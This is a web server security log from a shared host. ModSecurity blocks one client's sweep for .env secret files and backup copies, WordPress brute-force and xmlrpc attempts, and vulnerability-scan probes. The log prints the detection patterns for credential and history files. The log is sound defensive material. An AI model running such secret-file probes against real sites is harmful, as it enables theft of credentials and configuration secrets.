[Tue May 26 12:49:39.350038 2026] [security2:error] [pid 448967:tid 449113] [client 208.84.100.229:19046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0LAAAABA"]
[Tue May 26 12:49:39.350045 2026] [security2:error] [pid 448967:tid 449125] [client 208.84.100.229:19034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0LgAAABw"]
[Tue May 26 12:49:39.351169 2026] [security2:error] [pid 448967:tid 449192] [client 208.84.100.229:18990] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0MgAAAF8"]
[Tue May 26 12:49:39.421599 2026] [security2:error] [pid 448967:tid 449132] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJiuXLPuWQsfM-UVS0HQAAACM"]
[Tue May 26 12:49:41.845841 2026] [security2:error] [pid 448967:tid 449107] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJjeXLPuWQsfM-UVS0nAAAAAo"]
[Tue May 26 12:49:44.343443 2026] [security2:error] [pid 448967:tid 449174] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJj-XLPuWQsfM-UVS07gAAAE0"]
[Tue May 26 12:49:44.586276 2026] [security2:error] [pid 448967:tid 449065] [remote 146.196.64.107:38108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.64.196.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVJkOXLPuWQsfM-UVS0_AAADWE"]
[Tue May 26 12:49:45.516693 2026] [security2:error] [pid 448967:tid 449193] [client 157.20.138.61:50527] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJkeXLPuWQsfM-UVS1IQAAAGA"]
[Tue May 26 12:49:45.516817 2026] [security2:error] [pid 448967:tid 449193] [client 157.20.138.61:50527] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJkeXLPuWQsfM-UVS1IQAAAGA"]
[Tue May 26 12:49:45.548810 2026] [security2:error] [pid 448967:tid 449224] [client 208.84.100.229:19056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahVJkeXLPuWQsfM-UVS1JwAAAH8"]
[Tue May 26 12:49:45.781086 2026] [security2:error] [pid 448967:tid 449209] [client 74.249.173.207:40705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVJkeXLPuWQsfM-UVS1KwAAAHA"]
[Tue May 26 12:49:45.871304 2026] [proxy:error] [pid 448967:tid 449113] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:49:45.871363 2026] [proxy_http:error] [pid 448967:tid 449113] [client 185.169.4.152:61157] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:49:45.872379 2026] [proxy:error] [pid 448967:tid 449113] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:49:45.872411 2026] [proxy_http:error] [pid 448967:tid 449113] [client 185.169.4.152:61157] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:49:46.995325 2026] [security2:error] [pid 448967:tid 449154] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJkuXLPuWQsfM-UVS1QQAAADk"]
[Tue May 26 12:49:47.732054 2026] [security2:error] [pid 448967:tid 448974] [remote 5.250.187.247:56006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVJk-XLPuWQsfM-UVS1WgAAbAY"]
[Tue May 26 12:49:48.075944 2026] [security2:error] [pid 448967:tid 449171] [client 85.208.96.209:36074] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-12th-16th/list/"] [unique_id "ahVJlOXLPuWQsfM-UVS1cgAAAEo"]
[Tue May 26 12:49:48.076044 2026] [security2:error] [pid 448967:tid 449171] [client 85.208.96.209:36074] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-12th-16th/list/"] [unique_id "ahVJlOXLPuWQsfM-UVS1cgAAAEo"]
[Tue May 26 12:49:48.346139 2026] [security2:error] [pid 448967:tid 449197] [client 208.84.100.229:25592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahVJlOXLPuWQsfM-UVS1dgAAAGQ"]
[Tue May 26 12:49:48.351943 2026] [security2:error] [pid 448967:tid 449141] [client 208.84.100.229:25598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahVJlOXLPuWQsfM-UVS1eAAAACw"]
[Tue May 26 12:49:48.451679 2026] [security2:error] [pid 448967:tid 449220] [client 208.84.100.229:25416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVJlOXLPuWQsfM-UVS1gwAAAHs"]
[Tue May 26 12:49:48.452137 2026] [security2:error] [pid 448967:tid 449222] [client 208.84.100.229:25518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahVJlOXLPuWQsfM-UVS1hwAAAH0"]
[Tue May 26 12:49:48.452205 2026] [security2:error] [pid 448967:tid 449169] [client 208.84.100.229:25414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVJlOXLPuWQsfM-UVS1hAAAAEg"]
[Tue May 26 12:49:48.452988 2026] [security2:error] [pid 448967:tid 449110] [client 208.84.100.229:25570] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahVJlOXLPuWQsfM-UVS1hgAAAA0"]
[Tue May 26 12:49:48.453314 2026] [security2:error] [pid 448967:tid 449097] [client 208.84.100.229:25462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahVJlOXLPuWQsfM-UVS1iwAAAAA"]
[Tue May 26 12:49:48.453948 2026] [security2:error] [pid 448967:tid 449128] [client 208.84.100.229:25520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahVJlOXLPuWQsfM-UVS1jgAAAB8"]
[Tue May 26 12:49:48.454000 2026] [security2:error] [pid 448967:tid 449211] [client 208.84.100.229:25530] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahVJlOXLPuWQsfM-UVS1jwAAAHI"]
[Tue May 26 12:49:48.454367 2026] [security2:error] [pid 448967:tid 449179] [client 208.84.100.229:25428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVJlOXLPuWQsfM-UVS1kAAAAFI"]
[Tue May 26 12:49:48.454504 2026] [security2:error] [pid 448967:tid 449132] [client 208.84.100.229:25478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahVJlOXLPuWQsfM-UVS1kQAAACM"]
[Tue May 26 12:49:48.454532 2026] [security2:error] [pid 448967:tid 449195] [client 208.84.100.229:25540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahVJlOXLPuWQsfM-UVS1jQAAAGI"]
[Tue May 26 12:49:48.455138 2026] [security2:error] [pid 448967:tid 449206] [client 208.84.100.229:25446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahVJlOXLPuWQsfM-UVS1kgAAAG0"]
[Tue May 26 12:49:48.455209 2026] [security2:error] [pid 448967:tid 449198] [client 208.84.100.229:25438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVJlOXLPuWQsfM-UVS1kwAAAGU"]
[Tue May 26 12:49:48.455591 2026] [security2:error] [pid 448967:tid 449157] [client 208.84.100.229:25402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVJlOXLPuWQsfM-UVS1lgAAADw"]
[Tue May 26 12:49:48.456020 2026] [security2:error] [pid 448967:tid 449144] [client 208.84.100.229:25490] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahVJlOXLPuWQsfM-UVS1lAAAAC8"]
[Tue May 26 12:49:48.456353 2026] [security2:error] [pid 448967:tid 449187] [client 208.84.100.229:25456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahVJlOXLPuWQsfM-UVS1lwAAAFo"]
[Tue May 26 12:49:48.456420 2026] [security2:error] [pid 448967:tid 449154] [client 208.84.100.229:25358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahVJlOXLPuWQsfM-UVS1mAAAADk"]
[Tue May 26 12:49:48.456870 2026] [security2:error] [pid 448967:tid 449212] [client 208.84.100.229:25550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahVJlOXLPuWQsfM-UVS1jAAAAHM"]
[Tue May 26 12:49:48.457379 2026] [security2:error] [pid 448967:tid 449191] [client 208.84.100.229:25566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahVJlOXLPuWQsfM-UVS1ggAAAF4"]
[Tue May 26 12:49:49.697058 2026] [security2:error] [pid 448967:tid 449184] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJleXLPuWQsfM-UVS1qAAAAFc"]
[Tue May 26 12:49:53.073260 2026] [security2:error] [pid 448967:tid 449135] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJmOXLPuWQsfM-UVS1-wAAACY"]
[Tue May 26 12:49:56.022519 2026] [autoindex:error] [pid 448967:tid 449194] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/gallery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/gallery
[Tue May 26 12:49:56.040707 2026] [security2:error] [pid 448967:tid 449165] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJm-XLPuWQsfM-UVS2cQAAAEQ"]
[Tue May 26 12:49:56.101140 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:50883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJm-XLPuWQsfM-UVS2eQAAAA0"]
[Tue May 26 12:49:56.101278 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:50883] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJm-XLPuWQsfM-UVS2eQAAAA0"]
[Tue May 26 12:49:58.680739 2026] [security2:error] [pid 448967:tid 449111] [client 74.249.173.207:40711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVJnuXLPuWQsfM-UVS23AAAAA4"]
[Tue May 26 12:49:58.774099 2026] [security2:error] [pid 448967:tid 449146] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJnuXLPuWQsfM-UVS2zwAAADE"]
[Tue May 26 12:50:00.142877 2026] [proxy:error] [pid 448967:tid 449133] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:00.142948 2026] [proxy_http:error] [pid 448967:tid 449133] [client 185.169.4.152:61359] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:50:00.143535 2026] [proxy:error] [pid 448967:tid 449133] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:00.143570 2026] [proxy_http:error] [pid 448967:tid 449133] [client 185.169.4.152:61359] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:50:00.766356 2026] [autoindex:error] [pid 448967:tid 449154] [client 43.166.244.192:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.aeromodellingconsultants.com
[Tue May 26 12:50:01.726593 2026] [security2:error] [pid 448967:tid 449212] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJoeXLPuWQsfM-UVS3IgAAAHM"]
[Tue May 26 12:50:01.761114 2026] [security2:error] [pid 448967:tid 449098] [client 14.191.221.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJoeXLPuWQsfM-UVS3JQAAAAE"]
[Tue May 26 12:50:04.375039 2026] [security2:error] [pid 448967:tid 449151] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJo-XLPuWQsfM-UVS3awAAADY"]
[Tue May 26 12:50:05.837310 2026] [security2:error] [pid 448967:tid 449173] [client 66.249.82.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVJpOXLPuWQsfM-UVS3dAAAAEw"]
[Tue May 26 12:50:06.565100 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:51231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJpuXLPuWQsfM-UVS3twAAAEY"]
[Tue May 26 12:50:06.565275 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:51231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJpuXLPuWQsfM-UVS3twAAAEY"]
[Tue May 26 12:50:07.233463 2026] [security2:error] [pid 448967:tid 449150] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJpuXLPuWQsfM-UVS3vwAAADU"]
